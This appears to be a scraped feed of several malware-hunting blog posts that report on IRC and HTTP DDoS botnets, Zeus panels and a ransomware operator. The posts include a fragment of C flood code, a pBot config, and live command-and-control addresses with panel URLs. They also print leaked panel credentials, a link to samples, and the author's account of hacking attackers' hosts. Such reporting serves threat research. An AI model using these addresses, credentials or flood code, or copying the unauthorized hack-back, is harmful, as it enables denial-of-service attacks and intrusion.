for(i = 0;i<num_threads argv="" flood...="" flood="" for="" fprintf="" i="0;i<(atoi(argv[5])*multiplier);i++)" if="" multiplier="" n="" null="" pps="" pthread_create="" stdout="" tarting="" thread="" usleep="" void=""> maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}
</num_threads></time></pps></number></port></target></code></pre>
<br />
<br />bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-20206672997208950842016-11-13T09:21:00.000-08:002016-11-13T09:21:38.908-08:00pBot Skidd - 93.158.200.94 - IRC<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
// users
9/tcp open irc Unreal ircd
| irc-info:
| server: irc.MoneyZ.gov.GoV
| version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV
| servers: 1
| chans: 2
| users: 246
| lservers: 0
| lusers: 246
//confg
class pBot
{
var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8", "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
var $users = array();
function start() {
while(true)
{
</code></pre>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-50364099785669866882016-11-12T08:17:00.001-08:002016-11-12T08:17:56.295-08:00Bot - l.lolole.net - IRCDNS : l.lolole.net<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
<< NOTICE AUTH :*** Looking up your hostname...
<< NOTICE AUTH :*** Found your hostname
>> USER dk dk dk dk
>> NICK dkacoxfdb
<< 001 dkacoxfdb
<< 002 dkacoxfdb : M0dded by uNkn0wn Crew
<< 003 dkacoxfdb
<< 004 dkacoxfdb : www.uNkn0wn.eu - iD@uNkn0wn.eu
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 422 dkacoxfdb :MOTD File is missing
<< MODE dkacoxfdb :+iwG
>> JOIN #k
<< JOIN :#k
>> PING :E.tk
>> PONG :E.tk
</code></pre><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<a href="https://www.virustotal.com/en/file/7fb99af8a9403c406bc0883a9ae0f0d11d46d73e4ce5a9462d22e9b6ede25749/analysis/" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"><img alt="test" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjDIqIhUe5O4gSb8xmgunDE92zPt6tT3XSYCpc2OStdN6KX9E83l7jf6jvv-O6mBpLrGpd3r8N1yEWkyOAaZ_LW4bFKk58d4mfHruqsBDXP-ptcGKjHU3nY7u6b2MzNQE0Y_qCD477mW3/s250/vt.PNG"></a><a href="https://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034"><img alt="https://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034" border="0" height="30" src="https://malwr.com/static/graphic/malwr.png" width="100" /></a>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-8869124020879419732015-03-14T10:26:00.003-07:002015-03-14T10:29:21.360-07:00Zbot - 151.236.58.229 - OwnedHere are 2 panels installed on the same host ,the host is hijacked for sure<br />
and the owner was so nice to let the root user whiout a password , same thing for the ftp uses default xampp user and pass for nix , thanks for that btw lol , samples are attached at the end password is "infected"<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4_6Y7zoQ-C3NpFEZYJPsehIor_7vAiEHlNUjG8-axuQbtRnRKeDBXctnWzQ86J09ofvg0xTSfj97fkPpjMjHL6-Y7bPf-cOIZpgob2I3OpGSSurKnHY1xFKN5fFfwcv-De_lC0zTANk/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4_6Y7zoQ-C3NpFEZYJPsehIor_7vAiEHlNUjG8-axuQbtRnRKeDBXctnWzQ86J09ofvg0xTSfj97fkPpjMjHL6-Y7bPf-cOIZpgob2I3OpGSSurKnHY1xFKN5fFfwcv-De_lC0zTANk/s320/1.png" /></a><br />
<pre class="php" name="code">user : admin
pass : badoo123
</pre><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisHOYc-faRlqlZphnjMZxSPSQK5l-Xp7hUBNiFr8-P-FHbjlcRl7txW989in-v2v3TG6whrtClLQ5UUzuUcCsifPedyUToFbAExsO-M82rV_srkqPNJWWCoJzXnqX6EUS6gARL_uwr0k8/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisHOYc-faRlqlZphnjMZxSPSQK5l-Xp7hUBNiFr8-P-FHbjlcRl7txW989in-v2v3TG6whrtClLQ5UUzuUcCsifPedyUToFbAExsO-M82rV_srkqPNJWWCoJzXnqX6EUS6gARL_uwr0k8/s320/2.png" /></a><br />
<pre class="php" name="code">user : admin
pass : badoo123
</pre><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTHsHTWjeF33CPiNUreypHsAdl0NDY8b33Ek_I_8INX873VjltxlAPelzsC7F6pgaljFt8nYQwfIratF-4MISb4WQ_ZNYQcTRv7hVXc-hFGtr3InaIsCqYoyRTNgZsuwBLbV03JXpTavw/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTHsHTWjeF33CPiNUreypHsAdl0NDY8b33Ek_I_8INX873VjltxlAPelzsC7F6pgaljFt8nYQwfIratF-4MISb4WQ_ZNYQcTRv7hVXc-hFGtr3InaIsCqYoyRTNgZsuwBLbV03JXpTavw/s320/3.png" /></a><br />
<br />
<pre class="php" name="code">hxxp://www.filehost.ro/31418144/infected_rar/
pass : infected
</pre>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com1tag:blogger.com,1999:blog-2580748854525661454.post-18953930669273964142015-02-15T07:27:00.004-08:002015-02-15T07:30:38.634-08:00Blue Botnet - HTTP Botnet Found a sample in the wild . <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM_829_V12JAtOLwbkxSBdjBJL6r37BdPwcNFlzRjBKC9bvtlDLo3WcCYN5GHy2oZPK3wlMPCV3PiDkJMoJNMHNMEUL8Js9eDAgT24piEJYlyWvmn6SxxiG6gEePocEP5wcbJGkG4laOA/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM_829_V12JAtOLwbkxSBdjBJL6r37BdPwcNFlzRjBKC9bvtlDLo3WcCYN5GHy2oZPK3wlMPCV3PiDkJMoJNMHNMEUL8Js9eDAgT24piEJYlyWvmn6SxxiG6gEePocEP5wcbJGkG4laOA/s320/1.png" /></a><br />
<br />
the sample was <b>uncrypted</b> as well and its coded in .<b>NET C#</b> also .<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49wS63PMI5i2HfceanTJHaYgvla2U3WuoaVUIzv0bsKZGtYcmolTEOuvHw_ooeOjiN8S6wkCtTTYbDIOCwUHrd_FyDp7cq2fIUwv4lGd6rbTGXrL2FcscGto0HdQYaeKcjJbSWRUmkLQ/s1600/vt.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49wS63PMI5i2HfceanTJHaYgvla2U3WuoaVUIzv0bsKZGtYcmolTEOuvHw_ooeOjiN8S6wkCtTTYbDIOCwUHrd_FyDp7cq2fIUwv4lGd6rbTGXrL2FcscGto0HdQYaeKcjJbSWRUmkLQ/s320/vt.png" /></a><br />
<br />
also lets take a look inside ( .NET )<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3RPGaUdLJeAP7zYz_VQ8fqEPqy_Ftm3Hcq4OIY831Ss4zNbb5TMPAu4iNotvKSkTQAH1urNXTIzAgcUq00a5mLZDqgqeqwXWTWC2BugbWyCrQXYw2UMbFz7xsEG0yMLiGjwZwYjixySY/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3RPGaUdLJeAP7zYz_VQ8fqEPqy_Ftm3Hcq4OIY831Ss4zNbb5TMPAu4iNotvKSkTQAH1urNXTIzAgcUq00a5mLZDqgqeqwXWTWC2BugbWyCrQXYw2UMbFz7xsEG0yMLiGjwZwYjixySY/s320/2.png" /></a><br />
<br />
Traced bot back and found the host , hacked it , got his <b>panel.rar</b> lol so following pictures are just a demo<br />
on my local net .. <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL6izPi2Q2TJ9t2MD-6BJ2aEA7ONR_wZtis3z1wq_v28r1jDFmmjODiY0Hj38MyABqCMiPJqO5MV4D0PZXRiJRMyx8g1GnnbqsHqRs6pCtKuHj3m7sKSlj-CpchcArEvVA3SxAPnheGI/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL6izPi2Q2TJ9t2MD-6BJ2aEA7ONR_wZtis3z1wq_v28r1jDFmmjODiY0Hj38MyABqCMiPJqO5MV4D0PZXRiJRMyx8g1GnnbqsHqRs6pCtKuHj3m7sKSlj-CpchcArEvVA3SxAPnheGI/s320/3.png" /></a><br />
<br />
<pre class="php" name="code">// index.php
?php
error_reporting(E_ERROR | E_PARSE);
if (file_exists("phash") == false){
header("Location: register.php");
} else {
$filename = "phash";
$fp = fopen($filename, "r");
$content = fread($fp, filesize($filename));
fclose($fp);
$storedPassHash = $content;
$passHash = $_COOKIE['phash'];
if (md5("randomsalt".$passHash) != $storedPassHash){
header("Location: login.php");
</pre><br />
Diferent ddos methods uses HTTP Proxy flood , Wordpres Pingback (xmlrpc) , TCP etc ...<br />
looks like <b><a href="https://github.com/huggye/HyperBeamEngine/blob/master/DoSAttack.cs">HyperBeamEngine</a></b><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2GC6DmxZXWwrYksWNW5OC6deHthvbbd10EOJ_mSbwiwk1XOCFF-lft_svQXsmDbYehlweXMNX_abRsAY1KlkG4xfj2QFzFosIgvklXoskYjI0pBny600BrlmxX4enjca_W5BbUqcVPXU/s1600/flood.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2GC6DmxZXWwrYksWNW5OC6deHthvbbd10EOJ_mSbwiwk1XOCFF-lft_svQXsmDbYehlweXMNX_abRsAY1KlkG4xfj2QFzFosIgvklXoskYjI0pBny600BrlmxX4enjca_W5BbUqcVPXU/s320/flood.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJuwp4TCZ7CBF5O8Y3GL9lJ_2vaMuQONYp6e9A6HnWHb_d61v-FcmYhPxZpKTtj8L4_idOK_AYEcGgogA1hQ299NsXw3ssvdVe45-DVdO5DCxpnbRUICFlLP-PqxR1Txj3b2ffpvNr0JY/s1600/3-1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJuwp4TCZ7CBF5O8Y3GL9lJ_2vaMuQONYp6e9A6HnWHb_d61v-FcmYhPxZpKTtj8L4_idOK_AYEcGgogA1hQ299NsXw3ssvdVe45-DVdO5DCxpnbRUICFlLP-PqxR1Txj3b2ffpvNr0JY/s320/3-1.png" /></a><br />
a demo of <b>TCP flood</b> , it requests <br />
botserver/panel<b>/target.ip</b><br />
botserver/panel<b>/target.method</b><br />
botserver/panel<b>/target.port</b><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4WM9mwy43k_f6rae2Oj-mVcVI_tNx92i3vdj7lW6Y8_fI17Vet1Sqr2tv3jy0FZ1GLNlGGTtI_jkhyphenhyphenmR2dSQ3PK0xB6xwoejQQ3yRupO3GmxxKoH0jo1uShpcYjX49T2eEJuuf3zig4/s1600/tcp.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4WM9mwy43k_f6rae2Oj-mVcVI_tNx92i3vdj7lW6Y8_fI17Vet1Sqr2tv3jy0FZ1GLNlGGTtI_jkhyphenhyphenmR2dSQ3PK0xB6xwoejQQ3yRupO3GmxxKoH0jo1uShpcYjX49T2eEJuuf3zig4/s320/tcp.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaWOvLXil-NYXY8f41qyH0Gh8yteyet4cbro_ZdZ9_lC8JsQhFzwkxhSwfawi9dhHkvfDM_U-HGd7qQ0-m709yvJA9DNvCS6Whpoda9UKcnF7ERaZT89hYTiQrcEx_4_HDtN_R-eLAz38/s1600/9.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaWOvLXil-NYXY8f41qyH0Gh8yteyet4cbro_ZdZ9_lC8JsQhFzwkxhSwfawi9dhHkvfDM_U-HGd7qQ0-m709yvJA9DNvCS6Whpoda9UKcnF7ERaZT89hYTiQrcEx_4_HDtN_R-eLAz38/s320/9.png" /></a><br />
<br />
<b>HTTP Flood</b> , http proxys of setting are saved here " botserver/panel/<b>proxy</b> " thats how the bot reads it<br />
if the target.method is HTTPFLOOD<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUpuWcqjAmiH6D0TuYsTqd-JBHB0IrQG1p05sU2lglJxxBlDiqP53dk3YbpCLHR_I1F3h5XxdWyFQ6vxemO2WG_vpLssrcrHbP9nQySxgeyGoylERbCliO5iesZfKTVVpVrgyFdQT2Ic/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUpuWcqjAmiH6D0TuYsTqd-JBHB0IrQG1p05sU2lglJxxBlDiqP53dk3YbpCLHR_I1F3h5XxdWyFQ6vxemO2WG_vpLssrcrHbP9nQySxgeyGoylERbCliO5iesZfKTVVpVrgyFdQT2Ic/s320/4.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1U6f3yGidmXLNXsfR8R_MkYYLIxgSE0HAvMGiUE-Yu2dCmRpSGNOfJODNctgBu4gJoypouKtS1rO2Ny2jzR2RkeLUp5wtU-8CB-kFK7m2EblulctrRyaIjBAjvsLUf4VsHkEFbaC4e4s/s1600/12.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1U6f3yGidmXLNXsfR8R_MkYYLIxgSE0HAvMGiUE-Yu2dCmRpSGNOfJODNctgBu4gJoypouKtS1rO2Ny2jzR2RkeLUp5wtU-8CB-kFK7m2EblulctrRyaIjBAjvsLUf4VsHkEFbaC4e4s/s320/12.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGoH2uTqDUaszyGbV1uipU8VHnmbLBSy4Y5UZffybFs33ygtk0EsXlTUMy6t1C6sjnvWpZGFzMkiDt-N9OSr0kCj2i-U3a5G3CwKJ93u6snB8xTObIQuNSWPa3GTYp4d9fefkU3v48dWY/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGoH2uTqDUaszyGbV1uipU8VHnmbLBSy4Y5UZffybFs33ygtk0EsXlTUMy6t1C6sjnvWpZGFzMkiDt-N9OSr0kCj2i-U3a5G3CwKJ93u6snB8xTObIQuNSWPa3GTYp4d9fefkU3v48dWY/s320/7.png" /></a><br />
<br />
Wordpress Pingback or how he calls it <b>PRESS</b> same as at the HTTPFLOD but here is the file savend uder<br />
botserver/panel/<b>blog</b> thats the file which we add hosts at setting<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-LnanyKy8tnZ0yJ72jwhu-pCFhWEuG7oVTlLmZJYdTj2ThZQjEj8PEOXSjt66K2yIJnrjsarf1H-XNSRCx5JxcpkE6ACATlFYd-OhYTof8HZxlNE3ZFrRlycYUl5Xg2IZRq5rJ4ICjY/s1600/13.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-LnanyKy8tnZ0yJ72jwhu-pCFhWEuG7oVTlLmZJYdTj2ThZQjEj8PEOXSjt66K2yIJnrjsarf1H-XNSRCx5JxcpkE6ACATlFYd-OhYTof8HZxlNE3ZFrRlycYUl5Xg2IZRq5rJ4ICjY/s320/13.png" /></a><br />
<br />
an <b>online</b> running botnet i found is here : <br />
<pre class="html" name="code">hxxp://burimche.net/help/login.php
// all online ip's of bots
hxxp://burimche.net/help/visitors.txt
hxxp://burimche.net/help/target.ip
hxxp://burimche.net/help/target.method
hxxp://burimche.net/help/target.port
// online bots
hxx://burimche.net/help/botlogger.php
</pre><a href="https://www.virustotal.com/en/file/ce79297e6e2b2242b49b520e373636147ba1609383ed14fcd4c2992627d8604f/analysis/1423852515/" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"><img alt="test" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjDIqIhUe5O4gSb8xmgunDE92zPt6tT3XSYCpc2OStdN6KX9E83l7jf6jvv-O6mBpLrGpd3r8N1yEWkyOAaZ_LW4bFKk58d4mfHruqsBDXP-ptcGKjHU3nY7u6b2MzNQE0Y_qCD477mW3/s250/vt.PNG" /></a><br />
Want Sample and Panel ? conntact me at email , for research purposes only !!bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com4tag:blogger.com,1999:blog-2580748854525661454.post-24459649671270568612015-02-10T10:43:00.002-08:002015-02-10T10:43:31.345-08:00Zeus / Cryptlocker - skid - information@jupimail.comFound an easy modified zeus panel , after puting a shell into<br />
so we got user and pass from database i found there was an<br />
script enabled for download and execute a file see at pic3<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJkX7R7AFh0DYWAyxcLQ8z51mrWPyz3axFzvZvmBR3jAtCbR__ZG9oF-Oseq_jpm5-slxLdQ8wd-7rh8lXmcJgGgcEhMeijQOld9AOa5FNSBF1KLhiLzh7-XKjTS_nSNQgl-TZdxAM0E/s1600/z2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJkX7R7AFh0DYWAyxcLQ8z51mrWPyz3axFzvZvmBR3jAtCbR__ZG9oF-Oseq_jpm5-slxLdQ8wd-7rh8lXmcJgGgcEhMeijQOld9AOa5FNSBF1KLhiLzh7-XKjTS_nSNQgl-TZdxAM0E/s320/z2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijkvIjlMBEAzyknvpiUBao8EvPRCqWh2wXd8jadLyhaMVyxLCvv8dUhdtQq3Dpt88NQZxATUx0iuKmlNLdXqhl0n7U0Wt5HIX_Ea13SSSbqsZ0JMfN8lpknKFCek7FH_PENCksNX7GCHw/s1600/z1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijkvIjlMBEAzyknvpiUBao8EvPRCqWh2wXd8jadLyhaMVyxLCvv8dUhdtQq3Dpt88NQZxATUx0iuKmlNLdXqhl0n7U0Wt5HIX_Ea13SSSbqsZ0JMfN8lpknKFCek7FH_PENCksNX7GCHw/s320/z1.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVv-qMk8kuJqV5wCC6S6onMQnPOPxC17HIieQELC5PXqOp820u3QO-rwNLL-09869ikRWQAQQuTgKCJpCbs9ltw0k2jUP6V4WIxlVrAkiIIOje-jV2i44H3wv4BM1g-bfGyyEBTrTm1w/s1600/z3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVv-qMk8kuJqV5wCC6S6onMQnPOPxC17HIieQELC5PXqOp820u3QO-rwNLL-09869ikRWQAQQuTgKCJpCbs9ltw0k2jUP6V4WIxlVrAkiIIOje-jV2i44H3wv4BM1g-bfGyyEBTrTm1w/s320/z3.png" /></a><br />
<br />
Virustotatl update.src .. this is a cryptlocker <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Sohg0l_boMqTtIsX_-R2Ra2yGq3OFl0l12dRJPFkuOo9StXkbKz5vgPDM7OgObM7MQMb5HBTJKRVeopTE3vJzXsmiFMUK_lRzOQrGgVGqM1TrivMhVEFRA_3E_mY-dLKS0nV8qIE-fs/s1600/z4.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Sohg0l_boMqTtIsX_-R2Ra2yGq3OFl0l12dRJPFkuOo9StXkbKz5vgPDM7OgObM7MQMb5HBTJKRVeopTE3vJzXsmiFMUK_lRzOQrGgVGqM1TrivMhVEFRA_3E_mY-dLKS0nV8qIE-fs/s320/z4.png" /></a><br />
<br />
also the desktop after it execution <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNLS2rrbE6LcTU6YbYqjJl4TzAwznLPMrJE7Rl_cgjgCyyQBxz4Xctu35khQc6Q9lJahLbQRe4Mns5e_gfKFD1NFE5w33xksjKuGhw6Q9WnP_YiYHfBYoS_hINmEbEgVjw8fzKynty0Q/s1600/zL.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNLS2rrbE6LcTU6YbYqjJl4TzAwznLPMrJE7Rl_cgjgCyyQBxz4Xctu35khQc6Q9lJahLbQRe4Mns5e_gfKFD1NFE5w33xksjKuGhw6Q9WnP_YiYHfBYoS_hINmEbEgVjw8fzKynty0Q/s320/zL.png" /></a><br />
<br />
So it give's an email address and says that conntact him and send him an sum from 100$ then we get our files back , <br />
so i wrote him an email just for fun and after some conversation i told him i dont know what bitcoin is im just a stupid<br />
user that lost his data and just want my data back, he responded like this <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXnWmef3nOgVzYg81FAllyFpxswozqY2F_E1FDzNQ2eiU1ElUBNZU5Uqc-sXkRBysVNchVjF2bRnwGK85Zm2-KRIGQbSyLXcdy9zkB8VHkRSPSVDCRtx2rim75PyO9Tt0i_LjJa2tCKk/s1600/zI.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXnWmef3nOgVzYg81FAllyFpxswozqY2F_E1FDzNQ2eiU1ElUBNZU5Uqc-sXkRBysVNchVjF2bRnwGK85Zm2-KRIGQbSyLXcdy9zkB8VHkRSPSVDCRtx2rim75PyO9Tt0i_LjJa2tCKk/s320/zI.png" /></a><br />
<br />
also an identity of a person , not sure if he is or like he said just a drop but he also send me other name's<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWCAJzuevNaxRG38byOkoU61DUDLqlrDzG5BvOflA-h1SZ9ZUvFqnWIs2aE_9X2sYepjg1he5A-_9Dyx-GBp-OoshQAnRxz-P4Zs9MoDOWDPsoOyTULPB7BYqmSFb6O5DugFFNo0V-Odc/s1600/zII.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWCAJzuevNaxRG38byOkoU61DUDLqlrDzG5BvOflA-h1SZ9ZUvFqnWIs2aE_9X2sYepjg1he5A-_9Dyx-GBp-OoshQAnRxz-P4Zs9MoDOWDPsoOyTULPB7BYqmSFb6O5DugFFNo0V-Odc/s320/zII.png" /></a><br />
<br />
I almost got him lol see following picture ..<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6LSO6uyvvjPaypwDvI-FTGRsqPbiJQgjaZmJqpbHJ9RJzy7MUBo5S9_jrOHD6vFveHEAxEhBPe1UZqX2yk0filqEqs0ipN3RVV55BkOrG8VvI1hp-lzIpvTe5o_lC_JuvTLhChv1hUAc/s1600/zAL.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6LSO6uyvvjPaypwDvI-FTGRsqPbiJQgjaZmJqpbHJ9RJzy7MUBo5S9_jrOHD6vFveHEAxEhBPe1UZqX2yk0filqEqs0ipN3RVV55BkOrG8VvI1hp-lzIpvTe5o_lC_JuvTLhChv1hUAc/s320/zAL.png" /></a><br />
<br />
and ye this was hist last message , PS lulz at his english <br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
Bro you seriousl or you malware reserceher?
i give you valid details
My name is Ivan Fedorov
i am in Latvia
You sure you wont myhelp
i am sent you N7 msg
any who REALY need data computer ASK N1 GET BITCOIN
MAKE IN 48 HOURZ
I UZE ZEUS BOTNETZ
ANTI CORUPTIONZ ANTI ILLUMINATI SYSEM
HOW YOU R MOMA DIE SLOW IN HOSPITAL
YOU BE SOME 1 GUY RUS HOW YOU ПИДАРАЗ
MAKE PAUZE YOUR SELF!
ты вставляешь пралки в калеса я рублюза за норм и не трогаю руских
ты тебя мама кормит она скора умрет и будет повышенпие оплат за квартиры и за еду и комунальных услуг и тд
короче нахуй ты мне тут мозг ееш и на тебя размениваться
ЧТОБ ТВОЯ МАМА УМЕРЛА
YOUR MOM EAT MY EXE
DON KILUMINATI 7 DAY THEORY
</code></pre>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com1tag:blogger.com,1999:blog-2580748854525661454.post-45157361547109874982015-02-08T11:44:00.001-08:002015-02-08T11:44:31.665-08:00IRC Botnet - 218.200.153.154 - PWNEDI don't know if this kid is just stupid or he really trying to dox me ,<br />
if so keep it going lol . Another attack from him on my honeypot <br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZbfLZpIouBpbJ4I7yFTAwHs49qwmm9lXOD22HbLdjWrbVcd8Kk07n1MtKj0Mmh23CRff1Jel6R7N6mFpjtNT29Aqxlb1MpSH-WoQM2KD3aOBXAYQYz3UxVEL1BUM3NCR3L4XL8Hd1fA/s1600/00.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZbfLZpIouBpbJ4I7yFTAwHs49qwmm9lXOD22HbLdjWrbVcd8Kk07n1MtKj0Mmh23CRff1Jel6R7N6mFpjtNT29Aqxlb1MpSH-WoQM2KD3aOBXAYQYz3UxVEL1BUM3NCR3L4XL8Hd1fA/s320/00.png" /></a><br />
and aggain he is using an IRC server for hosting bot's<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZucDRUDbsgvNRercMpqF5F5S0ul75HLikddL30uftn4vHdGQT1RnIdwAYMAugK2p9CARVPbHEazkbkf27CyRhTynxUVuLdUgyMU1irqXjwcKGpUot4Ab6R2TU3aIVEJDHXe-Oh19bEwM/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZucDRUDbsgvNRercMpqF5F5S0ul75HLikddL30uftn4vHdGQT1RnIdwAYMAugK2p9CARVPbHEazkbkf27CyRhTynxUVuLdUgyMU1irqXjwcKGpUot4Ab6R2TU3aIVEJDHXe-Oh19bEwM/s320/1.png" /></a><br />
PWNED aggain .. lolz<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZcfb6M6S3FOxg5XJZuCt0AUEvBvX9WBBVNvm8yw2f_8qcLnzqtuBw8vHbEnzO-Ti8bfJ3yAcWOQyqh0YQv5ERCek4BC3Dl1FG6dDG54OSVhym5SYQYVSOYmySj3td16WEUJoJ2JG7_FU/s1600/99.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZcfb6M6S3FOxg5XJZuCt0AUEvBvX9WBBVNvm8yw2f_8qcLnzqtuBw8vHbEnzO-Ti8bfJ3yAcWOQyqh0YQv5ERCek4BC3Dl1FG6dDG54OSVhym5SYQYVSOYmySj3td16WEUJoJ2JG7_FU/s320/99.png" /></a><br />
<code style="color: black; word-wrap: normal;">
</code>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-46016044350278785032015-02-01T05:18:00.000-08:002015-02-01T05:18:27.882-08:00Bot - botnet1.zapto.org - IRCdns : botnet1.zapto.org<br />
dns2: nhg24.zapto.org<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">>> PASS NhG
<< NOTICE AUTH :*** eh...
>> NICK Taze{NhG-XP-USA}595632
>> USER 2847 "" "TsGh" :2847
